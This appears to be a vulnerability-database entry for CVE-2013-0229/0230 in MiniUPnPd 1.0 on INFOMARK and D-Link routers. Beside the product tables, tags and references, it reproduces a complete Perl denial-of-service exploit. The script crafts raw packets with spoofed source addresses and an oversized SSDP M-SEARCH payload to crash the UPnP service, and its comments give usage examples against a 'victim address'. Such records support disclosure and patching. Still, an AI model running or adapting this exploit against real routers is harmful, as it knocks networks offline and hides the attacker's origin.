ID
VAR-E-201301-0049
CVE
| cve_id: | CVE-2013-0229 | Trust: 3.0 |
| cve_id: | CVE-2013-0230 | Trust: 2.8 |
EDB ID
37517
TITLE
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service. CVE-2013-0230CVE-2013-0229CVE-89625CVE-89624 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | infomark | model: | imw-c920w miniupnpd | scope: | eq | version: | 1.0 | Trust: 2.2 |
| vendor: | miniupnp | model: | project miniupnp | scope: | eq | version: | 1.0 | Trust: 0.6 |
| vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.4 | Trust: 0.6 |
| vendor: | miniupnpd | model: | - | scope: | eq | version: | 1.0 | Trust: 0.5 |
| vendor: | miniupnpd | model: | remote | scope: | eq | version: | 1.0 | Trust: 0.5 |
| vendor: | miniupnpd | model: | stack buffer overflow | scope: | eq | version: | 1.0 | Trust: 0.5 |
| vendor: | miniupnp | model: | project miniupnp | scope: | eq | version: | 1.3 | Trust: 0.3 |
| vendor: | d link | model: | dir-836l | scope: | eq | version: | 1.03 | Trust: 0.3 |
| vendor: | d link | model: | dir-826l 1.04b05 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-636l | scope: | eq | version: | 1.03 | Trust: 0.3 |
| vendor: | d link | model: | dir-626l | scope: | eq | version: | 1.03 | Trust: 0.3 |
| vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.3 | Trust: 0.3 |
| vendor: | miniupnp | model: | project miniupnp | scope: | ne | version: | 1.1 | Trust: 0.3 |
| vendor: | d link | model: | dir-836l 1.04b09 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-826l 1.05b06 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-636l 1.05b07 | scope: | ne | version: | - | Trust: 0.3 |
| vendor: | d link | model: | dir-626l 1.04b04 | scope: | ne | version: | - | Trust: 0.3 |
EXPLOIT
#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service exploit
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is HTTP
# like protocol and work with NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This or previous program is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk!
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Usage:
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT STATE SERVICE
# 1900/udp open upnp
# | upnp-info:
# | 192.168.1.1
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0
# | Location: http://192.168.1.1:5000/rootDesc.xml
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# | Name: INFOMARK Router
# | Manufacturer: INFOMARK
# | Model Descr: INFOMARK Router
# | Model Name: INFOMARK Router
# | Model Version: 1
# | Name: WANDevice
# | Manufacturer: MiniUPnP
# | Model Descr: WAN Device
# | Model Name: WAN Device
# | Model Version: 20070228
# | Name: WANConnectionDevice
# | Manufacturer: MiniUPnP
# | Model Descr: MiniUPnP daemon
# | Model Name: MiniUPnPd
# |_ Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT STATE SERVICE
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#
use Socket;
if ( $< != 0 ) {
print "Sorry, must be run as root!\n";
print "This script use RAW Socket.\n";
exit;
}
my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];
print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);
if (!defined $ip_dst) {
print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
select(undef, undef, undef, 0.55);
print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
print "[ Example:\n[ perl $0 192.168.1.1\n";
print "[ =============================================== ]\n";
print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
exit;
}
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();
# Main program
sub main {
my $packet;
$packet = iphdr();
$packet .= udphdr();
$packet .= payload();
# b000000m...
send_packet($packet);
}
# IP header (Layer 3)
sub iphdr {
my $ip_ver = 4; # IP Version 4 (4 bits)
my $iphdr_len = 5; # IP Header Length (4 bits)
my $ip_tos = 0; # Differentiated Services (8 bits)
my $ip_total_len = $iphdr_len + 20; # IP Header Length + Data (16 bits)
my $ip_frag_id = 0; # Identification Field (16 bits)
my $ip_frag_flag = 000; # IP Frag Flags (R DF MF) (3 bits)
my $ip_frag_offset = 0000000000000; # IP Fragment Offset (13 bits)
my $ip_ttl = 255; # IP TTL (8 bits)
my $ip_proto = 17; # IP Protocol (8 bits)
my $ip_checksum = 0; # IP Checksum (16 bits)
my $ip_src=gethostbyname(&randip) if !$ip_src; # IP Source (32 bits)
# IP Packet construction
my $iphdr = pack(
'H2 H2 n n B16 h2 c n a4 a4',
$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
$ip_ttl, $ip_proto, $ip_checksum,
$ip_src, $ip_dst
);
return $iphdr;
}
# UDP header (Layer 4)
sub udphdr {
my $udp_src_port = 31337; # UDP Sort Port (16 bits) (0-65535)
my $udp_dst_port = 1900; # UDP Dest Port (16 btis) (0-65535)
my $udp_len = 8 + length(payload()); # UDP Length (16 bits) (0-65535)
my $udp_checksum = 0; # UDP Checksum (16 bits) (XOR of header)
# UDP Packet
my $udphdr = pack(
'n n n n',
$udp_src_port, $udp_dst_port,
$udp_len, $udp_checksum
);
return $udphdr;
}
# Create SSDP Bomb
sub payload {
my $data;
my $head;
$data = "M-SEARCH * HTTP\/1.1\\r\\n";
for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
my $payload = pack('a' . length($data), $data);
return $payload;
}
# Generate random source ip address
sub randip () {
srand(time() ^ ($$ + ($$ << 15)));
my $ipdata;
$ipdata = join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
my $ipsrc = pack('A' . length($ipdata), rand($ipdata));
return $ipdata;
}
# Send the malformed packet
sub send_packet {
print "[ Target: $ARGV[0]\n";
select(undef, undef, undef, 0.30);
print "[ Send malformed SSDP packet..\n\n";
send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}
Trust: 1.0
EXPLOIT LANGUAGE
pl
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service
Trust: 1.6
TAGS
| tag: | exploit | Trust: 1.5 |
| tag: | remote | Trust: 1.0 |
| tag: | overflow | Trust: 1.0 |
| tag: | shell | Trust: 0.5 |
| tag: | code execution | Trust: 0.5 |
| tag: | denial of service | Trust: 0.5 |
| tag: | web | Trust: 0.5 |
CREDITS
Todor Donev
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2013-0230 | Trust: 4.0 |
| db: | NVD | id: | CVE-2013-0229 | Trust: 3.0 |
| db: | EXPLOIT-DB | id: | 37517 | Trust: 1.6 |
| db: | EDBNET | id: | 58727 | Trust: 0.6 |
| db: | 0DAYTODAY | id: | 23837 | Trust: 0.6 |
| db: | EDBNET | id: | 23462 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 131651 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 132599 | Trust: 0.5 |
| db: | PACKETSTORM | id: | 121873 | Trust: 0.5 |
| db: | CERT/CC | id: | VU#922681 | Trust: 0.3 |
| db: | BID | id: | 57607 | Trust: 0.3 |
| db: | BID | id: | 57608 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-0229 | Trust: 2.7 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2013-0230 | Trust: 2.5 |
| url: | https://www.exploit-db.com/exploits/37517/ | Trust: 0.6 |
| url: | https://0day.today/exploits/23837 | Trust: 0.6 |
| url: | https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play | Trust: 0.3 |
| url: | http://www.kb.cert.org/vuls/id/922681 | Trust: 0.3 |
| url: | http://miniupnp.free.fr/ | Trust: 0.3 |
| url: | https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf | Trust: 0.3 |
SOURCES
| db: | BID | id: | 57607 |
| db: | BID | id: | 57608 |
| db: | PACKETSTORM | id: | 131651 |
| db: | PACKETSTORM | id: | 132599 |
| db: | PACKETSTORM | id: | 121873 |
| db: | EXPLOIT-DB | id: | 37517 |
| db: | EDBNET | id: | 58727 |
| db: | EDBNET | id: | 23462 |
LAST UPDATE DATE
2022-07-27T09:12:09.060000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 57607 | date: | 2013-01-28T00:00:00 |
| db: | BID | id: | 57608 | date: | 2015-05-12T19:46:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 57607 | date: | 2013-01-28T00:00:00 |
| db: | BID | id: | 57608 | date: | 2013-01-28T00:00:00 |
| db: | PACKETSTORM | id: | 131651 | date: | 2015-04-27T15:55:55 |
| db: | PACKETSTORM | id: | 132599 | date: | 2015-07-08T00:53:09 |
| db: | PACKETSTORM | id: | 121873 | date: | 2013-06-05T00:50:31 |
| db: | EXPLOIT-DB | id: | 37517 | date: | 2015-07-07T00:00:00 |
| db: | EDBNET | id: | 58727 | date: | 2015-07-07T00:00:00 |
| db: | EDBNET | id: | 23462 | date: | 2015-07-08T00:00:00 |